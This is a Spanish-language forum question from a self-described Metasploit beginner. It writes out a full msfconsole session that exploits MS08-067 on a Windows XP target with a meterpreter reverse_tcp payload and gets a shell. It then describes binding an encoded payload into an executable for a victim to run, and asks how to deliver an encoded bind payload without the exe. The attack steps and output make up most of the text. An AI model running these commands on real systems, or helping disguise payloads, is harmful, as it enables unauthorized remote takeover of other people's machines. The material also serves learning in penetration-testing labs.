Soy novato en Metasploit. Todavía estoy aprendiendo lo básico, pero estoy confundido y me gustaría algo de ayuda.
1) - Anteriormente aprendí cómo simplemente explotar cualquier O.S. vulnerabilidad utilizando meterpreter. Podemos enviar un exploit al sistema de destino y crear un shell de enlace / inverso para el control. Ejemplo -
Hackee windows xp con MS08-067 exploit
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.4
(objetivo)
RHOST => 192.168.1.4
msf exploit(ms08_067_netapi) > exploit
%código%
meterpreter > sysinfo
Ahora, con los comandos anteriores, podemos usar un shell de destino desde la máquina atacante. No es necesario crear ningún archivo ejecutable para conectarse al sistema vulnerable objetivo. Meterpreter inyecta memoria automáticamente y podemos obtener shell.
2) -
Ahora, cuando usamos un codificador, tenemos que crear un exe y tenemos que enlazar nuestra carga útil dentro del exe. Cuando la víctima ejecuta este archivo, podemos obtener el shell del sistema de la víctima.
meterpreter > shell
Para explotar el sistema de la víctima, tenemos que transferir este archivo exe a su sistema.
Pregunta :
Anteriormente no requerimos ningún archivo ejecutable para explotar un sistema, pero con el uso de un codificador necesitamos un archivo ejecutable para ocultar la carga útil. ¿Podemos simplemente codificar nuestro paypreter tcp_bind payload sin exe y enviarlo al sistema víctima?
Cualquier ayuda realmente apreciable.